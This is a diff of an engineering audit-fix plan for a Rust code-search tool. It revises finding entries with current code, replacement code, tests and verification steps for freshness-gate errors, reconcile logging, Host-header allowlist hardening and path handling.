-        (1.0 - nb) * embedding_score + nb * name_score
-    } else {
-        embedding_score
-    };
-
-    if let Some(matcher) = ctx.glob_matcher {
-        if !matcher.is_match(file_part) {
-            return None;
-        }
-    }
-
-    let chunk_name = name.unwrap_or("");
-    let mut score = base_score.max(0.0) * ctx.note_index.boost(file_part, chunk_name);
-```
-
-### Notes
-
-P1.16 closes the CLI side (clamp at SearchFilter construction). This finding is the in-function defense-in-depth — keep both fixes. Add a property test: for any `name_boost`, `embedding_score`, `name_score` ∈ `f32::finite()`, the output is in `[0.0, ∞)`.
-
----
-
-## P2.55 — open_browser uses explorer.exe on Windows
-
-**Finding:** P2.55 in audit-triage.md
-**Files:** `src/cli/commands/serve.rs:89-104`
-**Why:** `explorer.exe <url>` doesn't navigate URLs reliably and can strip `?token=...` query strings. With auth on by default, this breaks the `--open` flow on Windows.
-
-### Current code
-
-`src/cli/commands/serve.rs:87-104`:
-
-```rust
-fn open_browser(url: &str) -> Result<()> {
-    #[cfg(target_os = "linux")]
-    let cmd = "xdg-open";
-    #[cfg(target_os = "macos")]
-    let cmd = "open";
-    #[cfg(target_os = "windows")]
-    let cmd = "explorer.exe";
-
-    std::process::Command::new(cmd)
-        .arg(url)
-        .stdout(std::process::Stdio::null())
-        .stderr(std::process::Stdio::null())
-        .spawn()
-        .with_context(|| format!("Failed to spawn {cmd} {url}"))?;
-    Ok(())
 }
 ```
 
-### Replacement
+4. **Update the eval gate's `require_fresh_gate`** at `src/cli/commands/eval/mod.rs:246-264` to give different advice per variant (EH-V1.30.1-2):
 
 ```rust
-fn open_browser(url: &str) -> Result<()> {
-    // PB-V1.30: on Windows, `explorer.exe <url>` doesn't reliably navigate
-    // and can strip query strings (the `?token=...` we depend on for auth).
-    // `cmd /C start "" "<url>"` hands the URL to the user's default browser
-    // through the documented Win32 protocol-handler path. The empty `""` is
-    // required because `start`'s first quoted arg is the window title.
-    #[cfg(target_os = "windows")]
-    {
-        std::process::Command::new("cmd")
-            .args(["/C", "start", "", url])
-            .stdout(std::process::Stdio::null())
-            .stderr(std::process::Stdio::null())
-            .spawn()
-            .with_context(|| format!("Failed to spawn cmd /C start \"\" {url}"))?;
+match cqs::daemon_translate::wait_for_fresh(&cqs_dir, budget_secs) {
+    FreshnessWait::Fresh(_) => Ok(()),
+    FreshnessWait::Timeout(snap) => anyhow::bail!(
+        "watch index is still stale after {budget_secs}s wait \
+         (modified_files={}, pending_notes={}, rebuild_in_flight={}); \
+         wait longer with --require-fresh-secs N or skip with --no-require-fresh",
+        snap.modified_files, snap.pending_notes, snap.rebuild_in_flight,
+    ),
+    FreshnessWait::NoDaemon(msg) => anyhow::bail!(
+        "watch daemon not reachable: {msg}\n\n\
+         Eval --require-fresh requires a running `cqs watch --serve`. Start it \
+         (`systemctl --user start cqs-watch`) or rerun with `--no-require-fresh`."
+    ),
+    FreshnessWait::Transport(msg) => anyhow::bail!(
+        "watch daemon transport error: {msg}\n\n\
+         The daemon socket exists but isn't responding. Check daemon health: \
+         `journalctl --user -u cqs-watch -n 50` and consider \
+         `systemctl --user restart cqs-watch`."
+    ),
+    FreshnessWait::BadResponse(msg) => anyhow::bail!(
+        "watch daemon returned malformed response: {msg}\n\n\
+         The daemon answered but the response was unparseable — likely a \
+         version skew. Restart cqs-watch and retry."
+    ),
+}
+```
+
+5. **Add `crate::limits::freshness_poll_ms_initial()`** reading `CQS_FRESHNESS_POLL_MS` (default 100, floor 25, ceiling 5000). Folds in SHL-V1.30-2 if convenient.
+
+6. **Add three tests** at `src/daemon_translate.rs::tests` (mirroring the existing `wait_for_fresh_returns_fresh_on_first_poll` mock pattern):
+   - `wait_for_fresh_returns_fresh_after_two_stale_polls` — TC-HAP-1.30.1-5: `UnixListener` accepts 3 connections, writes Stale envelope twice then Fresh, assert `FreshnessWait::Fresh(_)` and elapsed ≥ initial poll interval.
+   - `wait_for_fresh_returns_transport_when_daemon_dies_mid_poll` — TC-ADV-1.30.1-4: listener accepts first connection (returns Stale), then closes; assert subsequent return is `Transport(_)` not `NoDaemon` (socket file still exists but connection refused).
+   - `daemon_status_returns_bad_response_on_malformed_envelope` — TC-ADV-1.30.1-4: listener writes `{"status":"ok","output":` and closes; assert `Err(BadResponse(_))` distinguishable from socket-missing case.
+
+### Verification
+
+- `cargo build --features gpu-index` succeeds.
+- `cargo test --features gpu-index --lib daemon_translate -- wait_for_fresh` passes the three new tests.
+- Run `cqs eval --require-fresh` against a daemon that's hung (`kill -STOP $(pgrep -f cqs-watch)`) — expect a `Transport(...)` bail message within `--require-fresh-secs`, not `NoDaemon`.
+- Verify journal output during a long wait: `journalctl --user -u cqs-watch -f` shows at most one info line per poll outcome, never a flood of connect-warn lines.
+
+---
+
+## P2: P2-bundle-reconcile-stat — Reconcile `metadata()` error swallowed (EH-V1.30.1-7 + TC-ADV-1.30.1-5 + TC-ADV-1.30.1-6)
+
+**Files:** `src/cli/watch/reconcile.rs:116-132`, plus parallel pattern at `src/cli/watch/reindex.rs:501-509`
+**Effort:** ~45 minutes
+**Why:** Reconcile's `(Some(_), None)` and `disk > stored` arms swallow stat failures and clock skew silently. Permission-denied files or backwards-clock files quietly stay stale forever. No tracing, no test seeds the unreadable / future-mtime cases.
+
+### Current code
+
+```rust
+// src/cli/watch/reconcile.rs:116-132
+let disk_mtime = match lookup_path.metadata().and_then(|m| m.modified()) {
+    Ok(t) => t
+        .duration_since(std::time::UNIX_EPOCH)
+        .ok()
+        .map(cqs::duration_to_mtime_millis),
+    Err(_) => None,
+};
+let needs_reindex = match (stored_mtime, disk_mtime) {
+    (Some(stored), Some(disk)) => disk > *stored,
+    (None, _) => true,        // legacy/null stored mtime
+    (Some(_), None) => false, // can't read disk mtime → leave to GC
+};
+if needs_reindex && pending_files.insert(rel.clone()) {
+    modified += 1;
+    queued += 1;
+}
+```
+
+### Replacement / approach
+
+```rust
+// 1. Capture the stat error so we can warn on it.
+let disk_mtime = match lookup_path.metadata().and_then(|m| m.modified()) {
+    Ok(t) => t
+        .duration_since(std::time::UNIX_EPOCH)
+        .ok()
+        .map(cqs::duration_to_mtime_millis),
+    Err(e) => {
+        // EH-V1.30.1-7 / TC-ADV-1.30.1-6: surface stat failures so the
+        // operator can distinguish permission-denied files from
+        // genuinely-missing ones. Debug level keeps the journal clean
+        // for the common transient-AV-scan-on-WSL case but still
+        // searchable via `journalctl --priority=debug`.
+        tracing::debug!(
+            path = %lookup_path.display(),
+            error = %e,
+            "Reconcile: stat failed, leaving file to GC",
+        );
+        None
+    }
+};
+
+let needs_reindex = match (stored_mtime, disk_mtime) {
+    (Some(stored), Some(disk)) => {
+        // TC-ADV-1.30.1-5: detect clock-skew (stored > disk) and warn so
+        // the operator sees the corruption instead of silently dropping
+        // the file from reconcile forever. Treat as stale (reindex) —
+        // the file's content may have changed even if mtime moves
+        // backward (git checkout to older commit, for instance).
+        if *stored > disk {
+            tracing::warn!(
+                path = %lookup_path.display(),
+                stored_mtime = stored,
+                disk_mtime = disk,
+                "Reconcile: stored mtime is in the future relative to disk \
+                 (clock skew or git checkout to older commit?) — queuing reindex",
+            );
+            true
+        } else {
+            disk > *stored
+        }
+    }
+    (None, _) => true,        // legacy/null stored mtime
+    (Some(_), None) => false, // can't read disk mtime → leave to GC (debug warning above)
+};
+if needs_reindex && pending_files.insert(rel.clone()) {
+    modified += 1;
+    queued += 1;
+}
+```
+
+Apply the same `tracing::debug!` warning to the parallel arm at `src/cli/watch/reindex.rs:501-509` where `mtime=None` is silently stored.
+
+### Tests to add (in `src/cli/watch/reconcile.rs::tests`)
+
+```rust
+#[test]
+#[cfg(unix)]
+fn reconcile_clock_skew_stored_mtime_in_future_queues_reindex() {
+    // Seed a chunk with stored_mtime = now + 1h, write file at now.
+    // Assert the file is queued in pending_files (clock-skew detected).
+    // Verify the warn fires via tracing_test or capture.
+}
+
+#[test]
+#[cfg(unix)]
+fn reconcile_metadata_err_leaves_file_alone_with_debug_log() {
+    // chmod 0 on parent dir, run reconcile, assert file is NOT queued
+    // and the debug-level message was emitted (use tracing_test).
+}
+```
+
+### Verification
+
+- `cargo test --features gpu-index --lib reconcile -- reconcile_clock_skew reconcile_metadata_err`.
+- Manually: `chmod 000 /path/inside/repo`, restart daemon, `journalctl --user -u cqs-watch -f --priority=debug` shows the path-with-error line. Restore perms.
+
+---
+
+## P2: P2-bundle-watch-status-machine — Silent state transitions (OB-V1.30.1-3 + TC-HAP-1.30.1-8)
+
+**Reframed during verification:** original prompt's two proposed compute_* tests duplicated the existing `rebuild_dominates_over_stale_files` test at `src/watch_status.rs:278`. Both have been dropped. The transition-log emission fix (the load-bearing piece) is unchanged. The follow-on test that captures the transition log requires a non-existing `tracing-test` dev-dep — left as an explicit (a)-vs-(b) decision below. Both bundled finding IDs (OB-V1.30.1-3, TC-HAP-1.30.1-8) remain substantively covered: OB-V1.30.1-3 by the prev/next-compare emission, TC-HAP-1.30.1-8 by the existing 6 `compute_*` tests already pinning all four states.
+
+**Files:** `src/cli/watch/mod.rs:149-185`, `src/watch_status.rs:195-224`, tests in `src/watch_status.rs::tests`
+**Effort:** ~30 minutes (was ~45 — test additions dropped)
+**Why:** `publish_watch_snapshot` overwrites the snapshot every 100 ms with no transition logging — operators see no journal trail for Fresh↔Stale↔Rebuilding flips. (Original Why also claimed "Rebuilding and Unknown have no test through compute()" — that was wrong; the existing 6 `compute_*` tests already cover all four states including Rebuilding via `rebuild_dominates_over_stale_files` at line 278.)
+
+### Current code
+
+```rust
+// src/cli/watch/mod.rs:149-185
+fn publish_watch_snapshot(
+    handle: &cqs::watch_status::SharedWatchSnapshot,
+    state: &WatchState,
+    index_path: &std::path::Path,
+) {
+    let last_synced_at = std::fs::metadata(index_path)
+        .ok()
+        .and_then(|m| m.modified().ok())
+        .and_then(|t| t.duration_since(std::time::UNIX_EPOCH).ok())
+        .map(|d| d.as_secs() as i64);
+    let delta_saturated = state
+        .pending_rebuild
+        .as_ref()
+        .map(|p| p.delta_saturated)
+        .unwrap_or(false);
+    let snap = cqs::watch_status::WatchSnapshot::compute(cqs::watch_status::WatchSnapshotInput {
+        // ...
+    });
+    match handle.write() {
+        Ok(mut guard) => *guard = snap,
+        Err(poisoned) => {
+            tracing::warn!("watch_snapshot RwLock poisoned — recovering and continuing to publish");
+            *poisoned.into_inner() = snap;
+        }
+    }
+}
+```
+
+### Replacement / approach
+
+1. **Compare prev and next state under the write lock** and emit a single info-level transition event:
+
+```rust
+fn publish_watch_snapshot(
+    handle: &cqs::watch_status::SharedWatchSnapshot,
+    state: &WatchState,
+    index_path: &std::path::Path,
+) {
+    // ... existing snapshot-build code ...
+
+    let prev_state;
+    match handle.write() {
+        Ok(mut guard) => {
+            prev_state = guard.state;
+            *guard = snap.clone(); // clone to log after lock release
+        }
+        Err(poisoned) => {
+            tracing::warn!("watch_snapshot RwLock poisoned — recovering and continuing to publish");
+            let mut guard = poisoned.into_inner();
+            prev_state = guard.state;
+            *guard = snap.clone();
+        }
+    }
+
+    if prev_state != snap.state {
+        tracing::info!(
+            prev = prev_state.as_str(),
+            next = snap.state.as_str(),
+            modified_files = snap.modified_files,
+            rebuild_in_flight = snap.rebuild_in_flight,
+            dropped_this_cycle = snap.dropped_this_cycle,
+            "watch state transition",
+        );
+    }
+}
+```
+
+(Note: `WatchSnapshot` already derives `Clone`. `FreshnessState` derives `Copy` per `watch_status.rs:51`.)
+
+2. **Drop both originally-proposed `compute_*` tests** — they duplicated the existing `rebuild_dominates_over_stale_files` test at `watch_status.rs:278` which already pins `rebuild_in_flight=true, pending_files=5 -> Rebuilding`. The Why-section claim "Rebuilding has no test through compute()" was wrong; the existing 6 compute_* tests cover Fresh, Stale (via pending_files / pending_notes / dropped_events), Rebuilding, and Unknown.
+
+The remaining coverage question is whether `publish_watch_snapshot` actually emits the transition log on a state flip. There is no existing log-capture infrastructure in this codebase (verified: no `tracing-test` dev-dep in `Cargo.toml`, no `logs_contain` helper anywhere in `src/` or `tests/`). Two options:
+
+   **(a) Skip the transition-emission test** and rely on the manual journalctl smoke step below — the OB-V1.30.1-3 finding is substantively addressed by the prev/next compare under the write lock; an automated assertion adds little because the only failure mode is "didn't emit", which is hard to regress accidentally given the explicit `if prev_state != snap.state` branch.
+
+   **(b) If automated coverage matters,** add `tracing-test = "0.2"` to `[dev-dependencies]` in `Cargo.toml` and write a `#[tracing_test::traced_test]` test that drives `publish_watch_snapshot` twice with different states and asserts `logs_contain("watch state transition")`. Mark this as scope-creep relative to OB-V1.30.1-3 and split into a separate prompt if it doesn't fit the bundle's effort budget.
+
+Recommend (a) for this bundle — the transition-emission code path is small and reading the diff is sufficient verification.
+
+### Verification
+
+- `cargo test --features gpu-index --lib watch_status` (existing 6 compute_* tests still pass — Rebuilding precedence already covered by `rebuild_dominates_over_stale_files`).
+- Manually trigger reindex, observe one `watch state transition prev=fresh next=stale` line in `journalctl`, then `prev=stale next=rebuilding`, then `prev=rebuilding next=fresh`. No spam between transitions.
+
+---
+
+## P2: P2-bundle-eval-gate — `require_fresh_gate` invisible + untested (OB-V1.30.1-6 + TC-HAP-1.30.1-4 + TC-HAP-1.30.1-7)
+
+**Files:** `src/cli/commands/eval/mod.rs:219-275`, plus new `tests/cli_eval_freshness_gate_test.rs`
+**Effort:** ~60 minutes
+**Why:** `require_fresh_gate` is the central #1182 control point but lacks entry/exit tracing, the function itself is never called by any test, and every integration test bypasses it via `CQS_EVAL_REQUIRE_FRESH=0`.
+
+### Current code
+
+```rust
+// src/cli/commands/eval/mod.rs:219-275
+fn require_fresh_gate(no_require_fresh_flag: &bool, wait_secs: u64) -> Result<()> {
+    if *no_require_fresh_flag {
+        tracing::info!("Eval freshness gate disabled via --no-require-fresh");
+        return Ok(());
+    }
+    if env_disables_freshness_gate() {
+        tracing::info!("Eval freshness gate disabled via CQS_EVAL_REQUIRE_FRESH");
+        eprintln!(
+            "[eval] CQS_EVAL_REQUIRE_FRESH disables the freshness gate; running against current index"
+        );
+        return Ok(());
+    }
+    // ... wait_for_fresh dispatch ...
+}
+```
+
+### Replacement / approach
+
+1. **Wrap the function body in a span and emit terminal events**:
+
+```rust
+fn require_fresh_gate(no_require_fresh_flag: &bool, wait_secs: u64) -> Result<()> {
+    let _span = tracing::info_span!("require_fresh_gate", wait_secs).entered();
+    let start = std::time::Instant::now();
+
+    if *no_require_fresh_flag {
+        tracing::info!(
+            outcome = "bypass_flag",
+            "require_fresh_gate: disabled via --no-require-fresh",
+        );
+        return Ok(());
+    }
+    if env_disables_freshness_gate() {
+        tracing::info!(
+            outcome = "bypass_env",
+            "require_fresh_gate: disabled via CQS_EVAL_REQUIRE_FRESH",
+        );
+        eprintln!(
+            "[eval] CQS_EVAL_REQUIRE_FRESH disables the freshness gate; running against current index"
+        );
         return Ok(());
     }
 
-    #[cfg(target_os = "linux")]
-    let cmd = "xdg-open";
-    #[cfg(target_os = "macos")]
-    let cmd = "open";
-
-    #[cfg(any(target_os = "linux", target_os = "macos"))]
+    #[cfg(unix)]
     {
-        std::process::Command::new(cmd)
-            .arg(url)
-            .stdout(std::process::Stdio::null())
-            .stderr(std::process::Stdio::null())
-            .spawn()
-            .with_context(|| format!("Failed to spawn {cmd} {url}"))?;
-    }
-    Ok(())
-}
-```
+        use cqs::daemon_translate::FreshnessWait;
+        let root = crate::cli::find_project_root();
+        let cqs_dir = cqs::resolve_index_dir(&root);
+        let budget_secs = wait_secs.min(600);
 
----
+        eprintln!(
+            "[eval] checking watch-mode freshness (--no-require-fresh to skip; CQS_EVAL_REQUIRE_FRESH=0 in env)"
+        );
 
-## P2.56 — NTFS/FAT32 mtime equality
-
-**Finding:** P2.56 in audit-triage.md
-**Files:** `src/cli/watch.rs:551-560`
-**Why:** Watch loop uses exact `SystemTime` equality on cached mtime. FAT32 USB mounts have 2s mtime resolution — two saves within 2s collide, second save skipped.
-
-### Current code
-
-`src/cli/watch.rs:551-561` (`prune_last_indexed_mtime`) is *not* the equality site — it's the prune. The actual equality check lives in `should_reindex` callers. Audit cites `:551-560` as a proxy / pointer.
-
-### Notes
-
-Locate the actual mtime equality site via grep for `last_indexed_mtime.get` or `last_indexed_mtime` reads against a saved value. It's likely in `process_file_changes` or `should_reindex`. Once located, replace exact `==` with one of:
-
-1. `<` against bucketed mtime when `is_wsl_drvfs_path(path)` is true:
-   ```rust
-   let stale = if is_wsl_drvfs_path(path) {
-       // 2 s buckets — FAT32 mtime granularity floor
-       cached_mtime + Duration::from_secs(2) > current_mtime
-   } else {
-       cached_mtime == current_mtime
-   };
-   ```
-2. Or: fall back to content-hash equality on suspicious mtime ties (parser already computes content hash).
-
-Verifier should grep for the equality site, apply option (1), add a test that constructs two `SystemTime`s 1 second apart, the WSL path triggers the bucketed comparison, the non-WSL path keeps strict equality. Document the FAT32 caveat in the function header.
-
----
-
-## P2.57 — enforce_host_allowlist accepts missing Host
-
-**Finding:** P2.57 in audit-triage.md
-**Files:** `src/serve/mod.rs:230-251`
-**Why:** Missing-Host bypass is a unit-test ergonomic in production middleware. HTTP/1.0 + raw nc clients reach the handler with no allowlist check.
-
-### Current code
-
-`src/serve/mod.rs:234-251`:
-
-```rust
-async fn enforce_host_allowlist(
-    State(allowed): State<AllowedHosts>,
-    req: Request,
-    next: Next,
-) -> Result<Response, (StatusCode, &'static str)> {
-    match req.headers().get(header::HOST) {
-        None => Ok(next.run(req).await),
-        Some(value) => {
-            let host = value.to_str().unwrap_or("");
-            if allowed.contains(host) {
-                Ok(next.run(req).await)
-            } else {
-                tracing::warn!(host = %host, "serve: rejected request with disallowed Host header");
-                Err((StatusCode::BAD_REQUEST, "disallowed Host header"))
-            }
+        let result = cqs::daemon_translate::wait_for_fresh(&cqs_dir, budget_secs);
+        let elapsed_ms = start.elapsed().as_millis() as u64;
+        match &result {
+            FreshnessWait::Fresh(snap) => tracing::info!(
+                outcome = "fresh",
+                elapsed_ms,
+                modified_files = snap.modified_files,
+                "require_fresh_gate: resolved",
+            ),
+            FreshnessWait::Timeout(snap) => tracing::info!(
+                outcome = "timeout",
+                elapsed_ms,
+                modified_files = snap.modified_files,
+                "require_fresh_gate: resolved",
+            ),
+            FreshnessWait::NoDaemon(_) => tracing::info!(
+                outcome = "no_daemon",
+                elapsed_ms,
+                "require_fresh_gate: resolved",
+            ),
+            // ... new variants from P2-bundle-wait-fresh ...
         }
+        // ... existing bail/return logic ...
     }
+    // ... non-unix branch unchanged ...
 }
 ```
 
-### Replacement
+2. **Make `require_fresh_gate` and `env_disables_freshness_gate` `pub(crate)`** if not already, so the new test crate can call them.
+
+3. **Add unit tests** in `src/cli/commands/eval/mod.rs::tests`:
 
 ```rust
-async fn enforce_host_allowlist(
-    State(allowed): State<AllowedHosts>,
-    req: Request,
-    next: Next,
-) -> Result<Response, (StatusCode, &'static str)> {
-    let host = match req.headers().get(header::HOST) {
-        Some(v) => v.to_str().unwrap_or(""),
+#[test]
+fn require_fresh_gate_no_require_fresh_flag_returns_ok_without_daemon() {
+    // Just call it — no socket needed because the flag short-circuits
+    // before any daemon call.
+    let result = require_fresh_gate(&true, 5);
+    assert!(result.is_ok());
+}
+
+#[test]
+#[serial_test::serial(cqs_eval_require_fresh_env)]
+fn require_fresh_gate_env_disable_returns_ok_without_daemon() {
+    // SAFETY: serial test guards env mutation
+    unsafe {
+        std::env::set_var("CQS_EVAL_REQUIRE_FRESH", "0");
+    }
+    let result = require_fresh_gate(&false, 5);
+    unsafe {
+        std::env::remove_var("CQS_EVAL_REQUIRE_FRESH");
+    }
+    assert!(result.is_ok());
+}
+```
+
+4. **Add an integration test** at `tests/cli_eval_freshness_gate_test.rs`:
+   - Spin up the same `UnixListener` mock as `wait_for_fresh_returns_fresh_on_first_poll`.
+   - Point `XDG_RUNTIME_DIR` at the tempdir hosting it.
+   - Run `cqs eval` *without* `CQS_EVAL_REQUIRE_FRESH=0`.
+   - Assert exit 0 within 10 s, the `[eval] checking watch-mode freshness` line on stderr, and a non-zero `recall_at_5` in the report JSON.
+   - Gate behind `slow-tests` like other CLI tests.
+
+### Verification
+
+- `cargo test --features gpu-index --lib eval -- require_fresh_gate`.
+- `cargo test --features gpu-index,slow-tests --test cli_eval_freshness_gate_test`.
+- `journalctl` shows `outcome=fresh elapsed_ms=...` or `outcome=timeout` per eval invocation.
+
+---
+
+## P2: P2-bundle-rb1-rb6 — Path string mangling in reconcile + enumerate (RB-1 + RB-6)
+
+**Files:** `src/cli/watch/reconcile.rs:99`, `src/lib.rs:680-685`
+**Effort:** ~45 minutes
+**Why:** Two parallel "lossy path string" papercuts. Reconcile builds a UTF-8 lookup key via `to_string_lossy().replace('\\', "/")` — non-UTF-8 paths get U+FFFD substitution that won't match the indexer's own lossy conversion, causing permanent reindex storms. `enumerate_files` uses `unwrap_or(&path)` after a failed `strip_prefix` — on case-insensitive Windows / NTFS this silently leaks absolute paths into the relative-path workflow.
+
+### Current code
+
+```rust
+// src/cli/watch/reconcile.rs:95-99
+for rel in disk_files {
+    // Stored origins are typically relative; normalize to forward
+    // slashes for cross-platform matching parity with the rest of the
+    // store layer.
+    let origin = rel.to_string_lossy().replace('\\', "/");
+```
+
+```rust
+// src/lib.rs:680-685
+if path.starts_with(&root) {
+    Some(path.strip_prefix(&root).unwrap_or(&path).to_path_buf())
+} else {
+    tracing::warn!(path = %e.path().display(), "Skipping path outside project");
+    None
+}
+```
+
+### Replacement / approach
+
+```rust
+// src/cli/watch/reconcile.rs:95-99 — skip non-UTF-8 paths up front with warn
+for rel in disk_files {
+    let origin = match rel.to_str() {
+        Some(s) => s.replace('\\', "/"),
         None => {
-            // SEC-V1.30: missing-Host is malformed in production (HTTP/1.1
-            // requires Host; hyper synthesizes one on real traffic). Reject
-            // 400 instead of passing through — closes the DNS-rebinding
-            // bypass for HTTP/1.0 clients and raw nc requests. Tests that
-            // need to skip the allowlist now stamp a Host header in the
-            // Request::builder().
-            tracing::warn!("serve: rejected request missing Host header");
-            return Err((StatusCode::BAD_REQUEST, "missing Host header"));
+            // RB-1: non-UTF-8 path bytes don't round-trip through
+            // `to_string_lossy()` consistently with the indexer's own
+            // lossy conversion. Skipping with a warn is strictly
+            // better than re-queuing the file forever every reconcile
+            // cycle (~30 s) on WSL `/mnt/c/`.
+            tracing::warn!(
+                path = %rel.display(),
+                "reconcile: skipping non-UTF-8 path (will not be indexed until renamed)",
+            );
+            continue;
         }
     };
-    if allowed.contains(host) {
-        Ok(next.run(req).await)
-    } else {
-        tracing::warn!(host = %host, "serve: rejected request with disallowed Host header");
-        Err((StatusCode::BAD_REQUEST, "disallowed Host header"))
-    }
-}
 ```
 
-### Notes
-
-Existing `src/serve/tests.rs` fixtures via `Request::builder()` need `.header(HOST, "127.0.0.1:8080")` added. P1.12 covers the same bypass at higher priority — confirm this finding hasn't been swept into that fix already; if so, mark resolved.
-
----
-
-## P2.58 — --bind 0.0.0.0 host-allowlist breaks LAN
-
-**Finding:** P2.58 in audit-triage.md
-**Files:** `src/serve/mod.rs:207-218`
-**Why:** Wildcard bind populates allowlist with `{loopback, 0.0.0.0, 0.0.0.0:port}` only. LAN clients sending `Host: 192.168.1.5:8080` get 400, push operators to `--no-auth`.
-
-### Current code
-
-`src/serve/mod.rs:207-218`:
-
 ```rust
-pub(crate) fn allowed_host_set(bind_addr: &SocketAddr) -> AllowedHosts {
-    let port = bind_addr.port();
-    let mut set = HashSet::new();
-    for host in ["localhost", "127.0.0.1", "[::1]"] {
-        set.insert(host.to_string());
-        set.insert(format!("{host}:{port}"));
-    }
-    // SocketAddr::to_string wraps IPv6 in brackets automatically.
-    set.insert(bind_addr.to_string());
-    set.insert(bind_addr.ip().to_string());
-    Arc::new(set)
-}
-```
-
-### Replacement
-
-```rust
-pub(crate) fn allowed_host_set(bind_addr: &SocketAddr) -> AllowedHosts {
-    let port = bind_addr.port();
-    let mut set = HashSet::new();
-    for host in ["localhost", "127.0.0.1", "[::1]"] {
-        set.insert(host.to_string());
-        set.insert(format!("{host}:{port}"));
-    }
-    set.insert(bind_addr.to_string());
-    set.insert(bind_addr.ip().to_string());
-
-    // SEC-V1.30: when binding to a wildcard, we have no way to know which
-    // interface IP a legitimate LAN client will dial. Enumerate all local
-    // interfaces and add their IPs (plus `:port`) to the allowlist so
-    // teammate browsers on the same VLAN don't get 400'd into `--no-auth`.
-    if bind_addr.ip().is_unspecified() {
-        if let Ok(addrs) = if_addrs::get_if_addrs() {
-            for ifa in addrs {
-                let ip = ifa.ip().to_string();
-                set.insert(ip.clone());
-                set.insert(format!("{ip}:{port}"));
-            }
-        } else {
+// src/lib.rs:680-685 — surface case-insensitive-FS disagreement
+if path.starts_with(&root) {
+    match path.strip_prefix(&root) {
+        Ok(rel) => Some(rel.to_path_buf()),
+        Err(_) => {
+            // RB-6: starts_with said yes but strip_prefix said no —
+            // case-insensitive filesystem (NTFS/HFS+) where byte
+            // comparison sees `Cqs` vs `cqs` as different. Skip and
+            // warn so the operator sees the disagreement; the
+            // alternative (unwrap_or(&path)) silently leaks an
+            // absolute path into the rel workflow and breaks every
+            // downstream lookup.
             tracing::warn!(
-                "wildcard bind: failed to enumerate interfaces; LAN clients may hit \
-                 disallowed-Host 400. Use an explicit --bind <ip> if this is a problem."
+                path = %path.display(),
+                root = %root.display(),
+                "enumerate_files: starts_with passed but strip_prefix failed \
+                 (case-insensitive fs?) — skipping",
             );
+            None
         }
     }
-    Arc::new(set)
+} else {
+    tracing::warn!(path = %e.path().display(), "Skipping path outside project");
+    None
 }
 ```
 
-### Notes
+### Verification
 
-Adds `if_addrs` workspace dep — confirm via `Cargo.toml` whether it's already pulled in transitively (`notify` may already use it). If a new dep is unwanted, the alternative is to skip the host-header check entirely when `bind.is_unspecified()` and emit a one-line stderr at startup. State the trade-off in the verifier's PR.
+- `cargo build --features gpu-index`.
+- Linux test: create file with non-UTF-8 bytes (`touch $(printf 'foo\xff.rs')`), run reconcile, observe warn line + file absent from `pending_files`.
+- Windows test (manual): in a repo at `C:\Projects\cqs`, force a path with mismatched case via junction; run `cqs index` and check for the warn rather than absolute paths in the chunk store.
 
 ---
 
-## P2.59 — Migration restore_from_backup overwrites live DB while pool open
+## P2: EH-V1.30.1-1 — Parse failure leaves file with stale chunks AND no mtime update — reconciles forever
 
-**Finding:** P2.59 in audit-triage.md
-**Files:** `src/store/backup.rs:171-180`, `src/store/migrations.rs:106-128`
-**Why:** Atomic-replace over `db_path` while the SQLite pool from `migrate()`'s caller still holds open file descriptors. Pool sees old (unlinked) inode; new processes see restored DB. Two-state divergence in daemon contexts.
-
-### Current code
-
-`src/store/backup.rs:171-180`:
-
-```rust
-pub(crate) fn restore_from_backup(db_path: &Path, backup_db: &Path) -> Result<(), StoreError> {
-    let _span = tracing::info_span!("restore_from_backup").entered();
-    copy_triplet(backup_db, db_path)?;
-    tracing::info!(
-        db = %db_path.display(),
-        backup = %backup_db.display(),
-        "Restored DB from backup after migration failure"
-    );
-    Ok(())
-}
-```
-
-### Replacement
-
-Change the contract: `restore_from_backup` requires the caller to drop the pool first. Update the caller in `src/store/migrations.rs:106-128` to drop pool before calling.
-
-```rust
-/// Restore a DB file (+ WAL/SHM sidecars) from a backup.
-///
-/// # Safety
-/// Caller MUST close every pool open against `db_path` BEFORE calling. SQLite
-/// in-process pools hold file descriptors against the old inode that the
-/// atomic replace unlinks; queries through those descriptors after restore
-/// see the unlinked-old inode while new processes see the backup. Two-state
-/// divergence is silent — the WAL/SHM sidecars copied alongside the main DB
-/// land on the new inode while the pool's mmap'd sidecars belong to the old.
-///
-/// Public API note: callers that re-open a pool after restore must reopen
-/// fresh; the in-process Store handle held during migration is invalid.
-pub(crate) fn restore_from_backup(db_path: &Path, backup_db: &Path) -> Result<(), StoreError> {
-    let _span = tracing::info_span!("restore_from_backup").entered();
-    copy_triplet(backup_db, db_path)?;
-    tracing::info!(
-        db = %db_path.display(),
-        backup = %backup_db.display(),
-        "Restored DB from backup after migration failure"
-    );
-    Ok(())
-}
-```
-
-And in `src/store/migrations.rs:106-128`, hoist the pool close before the restore call. Use `pool.close().await` (via the existing `rt.block_on`) on every pool the migration owns.
-
-### Notes
-
-Verifier needs to read `migrations.rs:106-128` to identify the actual pool ownership. The minimal fix is correct documentation + caller-side `pool.close().await`. Add `PRAGMA wal_checkpoint(TRUNCATE)` against the live DB before restore to ensure WAL is drained.
-
----
-
-## P2.60 — stream_summary_writer bypasses WRITE_LOCK
-
-**Finding:** P2.60 in audit-triage.md
-**Files:** `src/store/chunks/crud.rs:504-545`
-**Why:** Streamed `INSERT OR IGNORE` from LLM provider threads runs against the SqlitePool directly, no WRITE_LOCK. Concurrent reindex contends for SQLite's exclusive lock; per-row implicit transactions are 1 fsync per row.
+**Files:** `src/cli/watch/reindex.rs:255-314`
+**Effort:** ~45 minutes
+**Why:** When `parser.parse_file_all_with_chunk_calls` returns `Err`, the watch loop emits `vec![]` for that file. The previous chunks stay as ghosts (no `upsert_*_and_prune` call), AND `chunks.source_mtime` is never updated, so reconcile keeps classifying the file MODIFIED on every tick — unbounded reindex-fail-warn loop until the syntax error is fixed.
 
 ### Current code
 
-`src/store/chunks/crud.rs:504-540`:
-
 ```rust
-    pub fn stream_summary_writer(
-        &self,
-        model: String,
-        purpose: String,
-    ) -> crate::llm::provider::OnItemCallback {
-        use std::sync::Arc;
-        let pool = self.pool.clone();
-        let rt = Arc::clone(&self.rt);
-        Box::new(move |custom_id: &str, text: &str| {
-            let now = chrono::Utc::now().to_rfc3339();
-            let pool = pool.clone();
-            let model = model.clone();
-            let purpose = purpose.clone();
-            let custom_id = custom_id.to_string();
-            let text = text.to_string();
-            let result = rt.block_on(async move {
-                sqlx::query(
-                    "INSERT OR IGNORE INTO llm_summaries \
-                     (content_hash, summary, model, purpose, created_at) \
